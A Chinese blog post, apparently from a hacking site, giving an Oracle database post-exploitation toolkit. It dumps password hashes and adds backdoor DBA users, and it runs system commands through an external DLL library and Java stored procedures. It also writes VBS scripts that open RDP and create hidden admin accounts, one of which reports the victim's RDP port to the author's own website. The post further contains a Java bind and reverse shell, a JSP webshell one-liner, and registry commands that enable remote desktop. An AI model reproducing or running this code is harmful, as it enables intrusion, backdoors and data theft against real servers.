oracle技术文档

# 鬼仔注:Open发我的一张图片 oracle_scanner.png

作者:Robert

配合open那个工具
第一部分

基本查询指令
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限

select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED \\当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录

第二部分,创建java,执行系统命令

no.1

Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

上面这个没有回显的

如果不行可以使用下面这个

Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

执行完后
执行

exec oracmd.exec ('net1 user robert iloveyou /add');

no2.

Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe";  // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe";  // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}

final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();

new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();

new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}

public static boolean isWindows() {
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}

};
/
Create or REPLACE PROCEDURE host_command (p_command  IN  VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines  INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);

host_command('dir C:\');

DBMS_OUTPUT.get_lines(l_output, l_lines);
END;

这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
host_command(‘dir C:\’);

no3.

create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;

这句注意最后这里要授权下当前登陆的用户

grant javasyspriv to system

最后执行

exec :x:=run_cmz('ipconfig');

第二部分 操作磁盘文件
no1.
建立目录

create or replace directory DIR as 'C:\';

此目录当然也可以是启动目录

授权

grant read, write on directory DIR to system

这步可以不用
然后执行操作

写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了

这步操作讲下载我的木马到c盘并执行

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript c:\3389.vbs');

vbs开启3389

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"'||'&'||'wsnetwork.ComputerName
Set oa=CreateObject("Scripting.FileSystemObject")
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
exec :x:=run_cmz('cscript c:\user.vbs');

无net添加admin用户

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389p.vbs', 'W');
utl_file.put_line(file, '

Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)

Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0
xPost.Send()

TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If
set obj=wscript.createObject("wscript.shell")
obj.Run("sc config TermService start= demand")
obj.Run("sc stop  TermService")
obj.Run("sc start TermService")
wscript.quit
');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript c:\3389p.vbs');
/
exec :x:=run_cmz('del c:\3389p.vbs');
/
http://blog.cnmoker.org/read3389/read.asp

这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了

第三部分 linux的一些操作

linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结

create or replace and compile java source named bob as
import java.io.*;
import java.net.*;
public class BOB{
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i<files.length;i++){
str+=files[i]+"\r\n";
}
return str;
}
public static String saveFile(String filepath,String value){
FileOutputStream fos=null;
try {
fos=new FileOutputStream(filepath);
fos.write(value.getBytes());
return "OK";
} catch (Exception e) {
return e.getMessage();
} finally{
if(fos!=null){
try {fos.close();} catch (Exception e) {}
}
}
}
public static String readFile(String pathfile,String code){
BufferedReader br=null;
String value="";
try {
br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
String s=null;
while((s=br.readLine())!=null){
value+=s;
}
return value;
} catch (Exception e) {
return e.getMessage();
} finally{
if(br!=null){try {br.close();} catch (IOException e) {}}
}
}
public static String execFile(String filepath,String code){
int i=0;
Runtime rt=Runtime.getRuntime();
String output="";
InputStreamReader isr = null;
char[] bufferC=new char[1024];
try{
Process ps=rt.exec(filepath);
isr=new InputStreamReader(ps.getInputStream(),code);
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
output+=new String(bufferC,0,i);
}
return output;
}catch(Exception e){
return e.getMessage();
}finally{
if(isr!=null)try {isr.close();} catch (IOException e) {}
}
}
public static String bindShell(int port){
ServerSocket ss=null;
Socket s=null;
try {
ss = new ServerSocket(port);
s=ss.accept();
new optShell(ss,s).start();

return "OK";
} catch (Exception e) {
return e.getMessage();
}
}
public static String reverseShell(String host,int port){
Socket s=null;
try{
s=new Socket(host,port);
new optShell(null,s).start();
return "OK";
}catch(Exception e){
return e.getMessage();
}
} //反弹shell的sqlj语句
public static class optShell extends Thread{
OutputStream os=null;
InputStream is=null;
ServerSocket ss;
Socket s;
public optShell(ServerSocket ss,Socket s){
this.ss=ss;
this.s=s;
try{
this.is=s.getInputStream();
this.os=s.getOutputStream();
}catch(Exception e){
if(os!=null)try {os.close();} catch(Exception ex) {}
if(is!=null)try {is.close();} catch(Exception ex) {}
if(s!=null)try {s.close();} catch(Exception ex) {}
if(ss!=null)try {ss.close();} catch(Exception ex) {}
}
}
public void run(){
BufferedReader br=new BufferedReader(new InputStreamReader(is));
String line="";
String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n";
try {
//os.write(cmdhelp.getBytes());
line=br.readLine();
while(!"exit".equals(line)){
if(line.length()>3){
StringBuffer sb=new StringBuffer(line.trim());
String cmd=sb.substring(0, 4);
if(cmd.equals("list")){
os.write("input you path:\r\n".getBytes());
line=br.readLine();
os.write(listFolder(line).getBytes());
}else if("save".equals(cmd)){
os.write("input you filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you value:\r\n".getBytes());
os.write(saveFile(line,br.readLine()).getBytes());
}else if("read".equals(cmd)){
os.write("input you filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK\r\n".getBytes());
os.write(readFile(line,br.readLine()).getBytes());
}else if("exec".equals(cmd)){
os.write("input you run filepath:\r\n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK\r\n".getBytes());
os.write(execFile(line,br.readLine()).getBytes());
}else{
os.write(cmdhelp.getBytes());
}
}else{
os.write(cmdhelp.getBytes());
}
line=br.readLine();
}
} catch (Exception e) {
e.printStackTrace();
}finally{
if(os!=null)try {os.close();} catch(Exception e) {}
if(is!=null)try {is.close();} catch(Exception e) {}
if(s!=null)try {s.close();} catch(Exception e) {}
if(ss!=null)try {ss.close();} catch(Exception e) {}
}
}
}
}
/
create or replace function BOB_LISTFOLDER(str varchar2) return varchar2
as language java name 'BOB.listFolder(java.lang.String) return java.lang.String';
/
create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2
as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String';
/
create or replace function BOB_BINDSHELL(port number) return varchar2
as language java name 'BOB.bindShell(int) return java.lang.String';
/
begin
Dbms_Java.Grant_Permission('scott','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete');
Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor');
Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve');
end;

这么一大段,仔细看
执行完后

Select BOB_LISTFOLDER(‘/usr’) FROM DUAL //列目录
Select BOB_EXECFILE(‘C:\WINDOWS\system32\cmd.exe /c dir c:\’,’GBK’) FROM DUAL; //执行命令
Select BOB_READFILE(‘/tmp/1.txt’,’GBK’) FROM DUAL; //读文件
Select BOB_SAVEFILE(‘/tmp/1.jsp’,'<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>’) FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG
Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去

其中本来还有reserver shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就去了许多麻烦

第四部分 技巧

一句话读取3389端口

exec :x:=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber');

一句话开3389 只合适win 2k3

exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f');

删除pcanywhere导致的终端登陆错误

exec :x:=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f');

感谢kj,和linx的文章.
最后说下,关于web injection部分
有时间在整理吧
不妥之处,请指教 QQ:1972097
over

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

发表评论